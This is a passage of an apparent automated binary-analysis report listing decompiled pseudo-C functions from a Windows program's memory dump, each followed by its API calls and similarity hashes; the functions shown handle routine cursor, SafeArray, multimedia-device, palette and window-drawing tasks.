                                                                                			E004536E4(long __eax, void* __ecx, short __edx) {
                                                                                				struct tagPOINT _v24;
                                                                                				long _t7;
                                                                                				long _t12;
                                                                                				long _t19;
                                                                                				void* _t21;
                                                                                				struct HWND__* _t27;
                                                                                				short _t28;
                                                                                				void* _t30;
                                                                                				struct tagPOINT* _t31;
                                                                                
                                                                                				_t21 = __ecx;
                                                                                				_t7 = __eax;
                                                                                				_t31 = _t30 + 0xfffffff8;
                                                                                				_t28 = __edx;
                                                                                				_t19 = __eax;
                                                                                				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                                                					L6:
                                                                                					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                                                				} else {
                                                                                					 *((short*)(__eax + 0x44)) = __edx;
                                                                                					if(__edx != 0) {
                                                                                						L5:
                                                                                						_t7 = SetCursor(E004536BC(_t19, _t28));
                                                                                						goto L6;
                                                                                					} else {
                                                                                						GetCursorPos(_t31);
                                                                                						_push(_v24.y);
                                                                                						_t27 = WindowFromPoint(_v24);
                                                                                						if(_t27 == 0) {
                                                                                							goto L5;
                                                                                						} else {
                                                                                							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                                                							if(_t12 != GetCurrentThreadId()) {
                                                                                								goto L5;
                                                                                							} else {
                                                                                								_t7 = SendMessageA(_t27, 0x20, _t27, E004071E0(SendMessageA(_t27, 0x84, 0, E00407270(_t31, _t21)), 0x200));
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t7;
                                                                                 			}

                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004536FF
                                                                                • WindowFromPoint.USER32(?,?), ref: 0045370C
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045371A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453721
                                                                                • SendMessageA.USER32 ref: 0045373A
                                                                                • SendMessageA.USER32 ref: 00453751
                                                                                • SetCursor.USER32(00000000), ref: 00453763
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction ID: d50399b3e599f5152306f37c222da6bd6a6c0ddd4f97c88b5f6b33df3f17dc2d
                                                                                • Opcode Fuzzy Hash: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction Fuzzy Hash: 1B01D4A670430036D6253A364D86F3F25989B85B96F10413FBA04BA2C3EA3D9D08536E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E0040C364(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                                				char _v260;
                                                                                				char _v768;
                                                                                				char _v772;
                                                                                				short* _v776;
                                                                                				intOrPtr _v780;
                                                                                				char _v784;
                                                                                				signed int _v788;
                                                                                				signed short* _v792;
                                                                                				char _v796;
                                                                                				char _v800;
                                                                                				intOrPtr* _v804;
                                                                                				void* __ebp;
                                                                                				signed char _t44;
                                                                                				signed int _t49;
                                                                                				signed short* _t56;
                                                                                				char* _t58;
                                                                                				void* _t64;
                                                                                				intOrPtr* _t69;
                                                                                				signed short* _t76;
                                                                                				signed short* _t79;
                                                                                				intOrPtr _t88;
                                                                                				void* _t90;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				void* _t94;
                                                                                				intOrPtr* _t102;
                                                                                				void* _t106;
                                                                                				intOrPtr _t107;
                                                                                				char* _t108;
                                                                                				void* _t109;
                                                                                
                                                                                				_v780 = __ecx;
                                                                                				_v776 = __eax;
                                                                                				_t44 =  *((intOrPtr*)(__edx));
                                                                                				_t97 = _t44 & 0x00000fff;
                                                                                				if((_t44 & 0x00000fff) != 0xc) {
                                                                                					_push(__edx);
                                                                                					_t88 = _v776;
                                                                                					_push(_t88);
                                                                                					L0040C060();
                                                                                					return _t88;
                                                                                				}
                                                                                				if((_t44 & 0x00000040) == 0) {
                                                                                					_v792 =  *((intOrPtr*)(__edx + 8));
                                                                                				} else {
                                                                                					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
                                                                                				}
                                                                                				_v788 =  *_v792 & 0x0000ffff;
                                                                                				_t90 = _v788 - 1;
                                                                                				if(_t90 >= 0) {
                                                                                					_t94 = _t90 + 1;
                                                                                					_t106 = 0;
                                                                                					_t108 =  &_v772;
                                                                                					do {
                                                                                						_v804 = _t108;
                                                                                						_push(_v804 + 4);
                                                                                						_t16 = _t106 + 1; // 0x1
                                                                                						_t76 = _v792;
                                                                                						_push(_t76);
                                                                                						L0040C088();
                                                                                						if(_t76 != 0) {
                                                                                							E00402888(0x14);
                                                                                						}
                                                                                						_push( &_v784);
                                                                                						_t19 = _t106 + 1; // 0x1
                                                                                						_t79 = _v792;
                                                                                						_push(_t79);
                                                                                						L0040C090();
                                                                                						if(_t79 != 0) {
                                                                                							E00402888(0x14);
                                                                                						}
                                                                                						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                						_t106 = _t106 + 1;
                                                                                						_t108 = _t108 + 8;
                                                                                						_t94 = _t94 - 1;
                                                                                					} while (_t94 != 0);
                                                                                				}
                                                                                				_push( &_v772);
                                                                                				_t49 = _v788;
                                                                                				_push(_t49);
                                                                                				_push(0xc);
                                                                                				L0040C078();
                                                                                				_t107 = _t49;
                                                                                				if(_t107 == 0) {
                                                                                					E00402888(0x12);
                                                                                				}
                                                                                				E0040C224(_v776, _t97);
                                                                                				 *_v776 = 0x200c;
                                                                                				 *((intOrPtr*)(_v776 + 8)) = _t107;
                                                                                				_t92 = _v788 - 1;
                                                                                				if(_t92 >= 0) {
                                                                                					_t93 = _t92 + 1;
                                                                                					_t69 =  &_v768;
                                                                                					_t102 =  &_v260;
                                                                                					do {
                                                                                						 *_t102 =  *_t69;
                                                                                						_t102 = _t102 + 4;
                                                                                						_t69 = _t69 + 8;
                                                                                						_t93 = _t93 - 1;
                                                                                					} while (_t93 != 0);
                                                                                					do {
                                                                                						goto L17;
                                                                                					} while (_t64 != 0);
                                                                                					return _t64;
                                                                                				}
                                                                                				L17:
                                                                                				_push( &_v796);
                                                                                				_push( &_v260);
                                                                                				_t56 = _v792;
                                                                                				_push(_t56);
                                                                                				L0040C0A8();
                                                                                				if(_t56 != 0) {
                                                                                					E00402888(0x14);
                                                                                				}
                                                                                				_push( &_v800);
                                                                                				_t58 =  &_v260;
                                                                                				_push(_t58);
                                                                                				_push(_t107);
                                                                                				L0040C0A8();
                                                                                				if(_t58 != 0) {
                                                                                					E00402888(0x14);
                                                                                				}
                                                                                				_v780();
                                                                                				_t64 = E0040C308(_v788 - 1, _t109);
                                                                                 			}

                                                                                APIs
                                                                                • VariantCopy.OLEAUT32(?), ref: 0040C394
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C3F9
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C41B
                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C45A
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C4C5
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C4E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                • String ID:
                                                                                • API String ID: 351091851-0
                                                                                • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction ID: e8cfbddb4b6d86e1814c4b1c7dcfa7253a557c948e887391303c1413b19c10f2
                                                                                • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction Fuzzy Hash: E6510D7590121DDBDB25DB59CD90BDAB3BCBB08304F4042EAEA09F7281D634AF858F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E0046A3B4(void* __eax) {
                                                                                				intOrPtr _v112;
                                                                                				intOrPtr _v116;
                                                                                				intOrPtr _v120;
                                                                                				intOrPtr _v124;
                                                                                				void* _v128;
                                                                                				void* _v140;
                                                                                				char _t53;
                                                                                				char _t57;
                                                                                				char _t61;
                                                                                				char _t65;
                                                                                				intOrPtr _t69;
                                                                                				intOrPtr _t76;
                                                                                				void* _t77;
                                                                                				long _t79;
                                                                                				long _t82;
                                                                                
                                                                                				_t77 = __eax;
                                                                                				_t79 = _t82;
                                                                                				 *(__eax + 0x2e8) = 0x102;
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 8;
                                                                                				mciSendCommandA( *(__eax + 0x2f2) & 0x0000ffff, 0x80b, 0x102, _t79);
                                                                                				_t53 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e3)) = _t53;
                                                                                				if(_t53 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000004;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 1;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t57 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e6)) = _t57;
                                                                                				if(_t57 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000008;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 7;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t61 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e5)) = _t61;
                                                                                				if(_t61 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000002;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 3;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t65 =  *((intOrPtr*)(_t79 + 4));
                                                                                				 *((char*)(_t77 + 0x2e7)) = _t65;
                                                                                				if(_t65 != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000010;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t79 + 8)) = 4;
                                                                                				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
                                                                                				_t69 =  *((intOrPtr*)(_t79 + 4));
                                                                                				if(_t69 == 0x207 || _t69 == 0x208 || _t69 == 0x203 || _t69 == 0x201) {
                                                                                					 *((char*)(_t77 + 0x2e4)) = 1;
                                                                                				}
                                                                                				if( *((char*)(_t77 + 0x2e4)) != 0) {
                                                                                					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000001;
                                                                                				}
                                                                                				 *(_t77 + 0x2e8) = 0x20000;
                                                                                				 *((intOrPtr*)(_t77 + 0x304)) = mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x843, 0x20000,  &_v128);
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				 *((intOrPtr*)(_t77 + 0x310)) = _v116 - _v124;
                                                                                				_t76 = _v112 - _v120;
                                                                                				 *((intOrPtr*)(_t77 + 0x314)) = _t76;
                                                                                				return _t76;
                                                                                 			}

                                                                                APIs
                                                                                • mciSendCommandA.WINMM(?,0000080B,00000102), ref: 0046A3DF
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A414
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A449
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A47E
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A4B3
                                                                                • mciSendCommandA.WINMM(?,00000843,00020000,?), ref: 0046A50C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CommandSend
                                                                                • String ID:
                                                                                • API String ID: 3079401599-0
                                                                                • Opcode ID: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction ID: 9f3064282c2c23eb361a6cf1d432f5e155d01ea21818f742c5ad4657b8b276cc
                                                                                • Opcode Fuzzy Hash: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction Fuzzy Hash: 27419560444791AADB11CF54C8CDBA73BE8AF05304F0844BAFD9C9F287D7B99848CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E00420BFC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				signed int _v32;
                                                                                				struct HDC__* _v44;
                                                                                				signed int* _t36;
                                                                                				signed int _t39;
                                                                                				signed int _t42;
                                                                                				signed int* _t52;
                                                                                				signed int _t56;
                                                                                				intOrPtr _t66;
                                                                                				void* _t72;
                                                                                				void* _t73;
                                                                                				void* _t74;
                                                                                				intOrPtr _t75;
                                                                                
                                                                                				_t73 = _t74;
                                                                                				_t75 = _t74 + 0xffffff90;
                                                                                				_v16 = __ecx;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t52 = _a8;
                                                                                				_v24 = _v16 << 4;
                                                                                				_v20 = E00408330(_v24, __eflags);
                                                                                				 *[fs:edx] = _t75;
                                                                                				_t56 = _v24;
                                                                                				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x420ef3, _t73, __edi, __esi, __ebx, _t72);
                                                                                				if(( *_t52 | _t52[1]) != 0) {
                                                                                					_t36 = _a4;
                                                                                					 *_t36 =  *_t52;
                                                                                					_t36[1] = _t52[1];
                                                                                				} else {
                                                                                					 *_a4 = GetSystemMetrics(0xb);
                                                                                					_a4[1] = GetSystemMetrics(0xc);
                                                                                				}
                                                                                				_v44 = GetDC(0);
                                                                                				if(_v44 == 0) {
                                                                                					E004200C0(_t56);
                                                                                				}
                                                                                				_push(_t73);
                                                                                				_push(0x420ce5);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t75;
                                                                                				_t39 = GetDeviceCaps(_v44, 0xe);
                                                                                				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
                                                                                				if(_t42 <= 8) {
                                                                                					__eflags = 1;
                                                                                					_v32 = 1 << _t42;
                                                                                				} else {
                                                                                					_v32 = 0x7fffffff;
                                                                                				}
                                                                                				_pop(_t66);
                                                                                				 *[fs:eax] = _t66;
                                                                                				_push(E00420CEC);
                                                                                				return ReleaseDC(0, _v44);
                                                                                			}





















                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00420C4A
                                                                                • GetSystemMetrics.USER32 ref: 00420C56
                                                                                • GetDC.USER32(00000000), ref: 00420C72
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00420C99
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00420CA6
                                                                                • ReleaseDC.USER32 ref: 00420CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CapsDeviceMetricsSystem$Release
                                                                                • String ID:
                                                                                • API String ID: 447804332-0
                                                                                • Opcode ID: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction ID: b5a1ea645670a87a40300d2b3d0004dea96dac25918e5ae6dc528da29662d6d6
                                                                                • Opcode Fuzzy Hash: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction Fuzzy Hash: 1F31A270B00204DFEB04DFA6D881AAEBBF5FF49310F50816AF414AB391C6789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E0042106C(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                				char _v5;
                                                                                				struct HPALETTE__* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct tagBITMAPINFO* _t36;
                                                                                				intOrPtr _t43;
                                                                                				struct HBITMAP__* _t47;
                                                                                				void* _t50;
                                                                                
                                                                                				_t36 = __ecx;
                                                                                				_t47 = __eax;
                                                                                				E00420F1C(__eax, _a4, __ecx);
                                                                                				_v12 = 0;
                                                                                				_v16 = CreateCompatibleDC(0);
                                                                                				_push(_t50);
                                                                                				_push(0x421109);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t50 + 0xfffffff4;
                                                                                				if(__edx != 0) {
                                                                                					_v12 = SelectPalette(_v16, __edx, 0);
                                                                                					RealizePalette(_v16);
                                                                                				}
                                                                                				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
                                                                                				_pop(_t43);
                                                                                				 *[fs:eax] = _t43;
                                                                                				_push(E00421110);
                                                                                				if(_v12 != 0) {
                                                                                					SelectPalette(_v16, _v12, 0);
                                                                                				}
                                                                                				return DeleteDC(_v16);
                                                                                			}











                                                                                APIs
                                                                                  • Part of subcall function 00420F1C: GetObjectA.GDI32(?,00000054), ref: 00420F30
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0042108E
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 004210AF
                                                                                • RealizePalette.GDI32(?), ref: 004210BB
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 004210D2
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 004210FA
                                                                                • DeleteDC.GDI32(?), ref: 00421103
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                • String ID:
                                                                                • API String ID: 1221726059-0
                                                                                • Opcode ID: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction ID: 4c8e86a8e62bf8e843ce22e0fa3398f7087306fd2782e42c4131c5f231b58ff0
                                                                                • Opcode Fuzzy Hash: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction Fuzzy Hash: E3118275B002187FDB10EBA9CC51F5EB7FCAB4D700F518466B514F7281D678A9108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004324CC(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v8;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                				void* _t35;
                                                                                				intOrPtr* _t43;
                                                                                
                                                                                				_t43 =  &_v8;
                                                                                				_t20 =  *0x46b8d0; // 0x0
                                                                                				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                                                				_t21 =  *0x46b8d0; // 0x0
                                                                                				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                                                				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                                					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                                				}
                                                                                				_t27 =  *0x46b8d0; // 0x0
                                                                                				SetPropA(_a4,  *0x487b72 & 0x0000ffff, _t27);
                                                                                				_t31 =  *0x46b8d0; // 0x0
                                                                                				SetPropA(_a4,  *0x487b70 & 0x0000ffff, _t31);
                                                                                				_t35 =  *0x46b8d0; // 0x0
                                                                                				 *0x46b8d0 = 0;
                                                                                				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                                                				return  *_t43;
                                                                                			}











                                                                                APIs
                                                                                • SetWindowLongA.USER32 ref: 004324F4
                                                                                • GetWindowLongA.USER32 ref: 004324FF
                                                                                • GetWindowLongA.USER32 ref: 00432511
                                                                                • SetWindowLongA.USER32 ref: 00432524
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 0043253B
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 00432552
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction ID: 1d398ade87635050a55010048a09e70f80f05b49b1a79d506cad9994c015bbcd
                                                                                • Opcode Fuzzy Hash: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction Fuzzy Hash: 1911EA75504249BFCB00EF99EC84D9A37ECFB08354F108226F914DB2A1D774EA408BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004208AC(void* __eax, signed int __ecx) {
                                                                                				char _v1036;
                                                                                				signed int _v1038;
                                                                                				struct tagRGBQUAD _v1048;
                                                                                				short _v1066;
                                                                                				void* _t20;
                                                                                				struct HDC__* _t25;
                                                                                				void* _t28;
                                                                                				void* _t31;
                                                                                				struct HPALETTE__* _t33;
                                                                                				LOGPALETTE* _t34;
                                                                                
                                                                                				_t31 = __eax;
                                                                                				_t33 = 0;
                                                                                				_t34->palVersion = 0x300;
                                                                                				if(__eax == 0) {
                                                                                					_v1038 = __ecx;
                                                                                					E00402994(_t28, __ecx << 2,  &_v1036);
                                                                                				} else {
                                                                                					_t25 = CreateCompatibleDC(0);
                                                                                					_t20 = SelectObject(_t25, _t31);
                                                                                					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
                                                                                					SelectObject(_t25, _t20);
                                                                                					DeleteDC(_t25);
                                                                                				}
                                                                                				if(_v1038 != 0) {
                                                                                					if(_v1038 != 0x10 || E00420814(_t34) == 0) {
                                                                                						E004206A4( &_v1036, _v1038 & 0x0000ffff);
                                                                                					}
                                                                                					_t33 = CreatePalette(_t34);
                                                                                				}
                                                                                				return _t33;
                                                                                			}














                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004208C5
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208CE
                                                                                • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424313,?,?,?,?,00422E1F), ref: 004208E2
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208EE
                                                                                • DeleteDC.GDI32(00000000), ref: 004208F4
                                                                                • CreatePalette.GDI32 ref: 0042093A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                • String ID:
                                                                                • API String ID: 2515223848-0
                                                                                • Opcode ID: 482c9c2788b0c37a5b9dfecb9249efeda884aeb6f599fa4f2b036e3790343ac4
                                                                                • Instruction ID: 325484a17df5b14f92a47423d6ed2c50f4fb832cdd6203f9564a378a98e35d35
                                                                                • Opcode Fuzzy Hash: 482c9c2788b0c37a5b9dfecb9249efeda884aeb6f599fa4f2b036e3790343ac4
                                                                                • Instruction Fuzzy Hash: D2019BA130432066E610776A9C47F6B71F88FC1714F41D82FF58AB72C3D57C8854835A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045AE60(void* __eax) {
                                                                                				struct tagRECT _v20;
                                                                                				struct HWND__* _t18;
                                                                                				void* _t29;
                                                                                				RECT* _t30;
                                                                                
                                                                                				_t29 = __eax;
                                                                                				ValidateRect(E0043BD14(__eax), 0);
                                                                                				InvalidateRect(E0043BD14(_t29), 0, 0xffffffff);
                                                                                				GetClientRect(E0043BD14(_t29), _t30);
                                                                                				_t18 = E0043BD14( *((intOrPtr*)(_t29 + 0x240)));
                                                                                				MapWindowPoints(E0043BD14(_t29), _t18,  &_v20, 2);
                                                                                				ValidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))), _t30);
                                                                                				return InvalidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
                                                                                			}








                                                                                APIs
                                                                                • ValidateRect.USER32(00000000,00000000,0045B6B4), ref: 0045AE70
                                                                                • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AE81
                                                                                • GetClientRect.USER32 ref: 0045AE8F
                                                                                • MapWindowPoints.USER32 ref: 0045AEAF
                                                                                • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AEC1
                                                                                • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045AED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                                • String ID:
                                                                                • API String ID: 2846033224-0
                                                                                • Opcode ID: 3c2b3297a28a6712cf709c30d3ef4196e5b5ec664aa24e26e9e8547ffadd32af
                                                                                • Instruction ID: b1e37b74211c5b0444d6c631685268bf9646e65aeb1a0234bab0008e2eca243a
                                                                                • Opcode Fuzzy Hash: 3c2b3297a28a6712cf709c30d3ef4196e5b5ec664aa24e26e9e8547ffadd32af
                                                                                • Instruction Fuzzy Hash: 9DF0B2A065430176DA40B6BACC87F4A229C9B4871CF10193E7629FB3C3DA3CE8144EF9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041FF90(void* __eax) {
                                                                                				void* _t36;
                                                                                
                                                                                				_t36 = __eax;
                                                                                				UnrealizeObject(E0041F36C( *((intOrPtr*)(__eax + 0x14))));
                                                                                				SelectObject( *(_t36 + 4), E0041F36C( *((intOrPtr*)(_t36 + 0x14))));
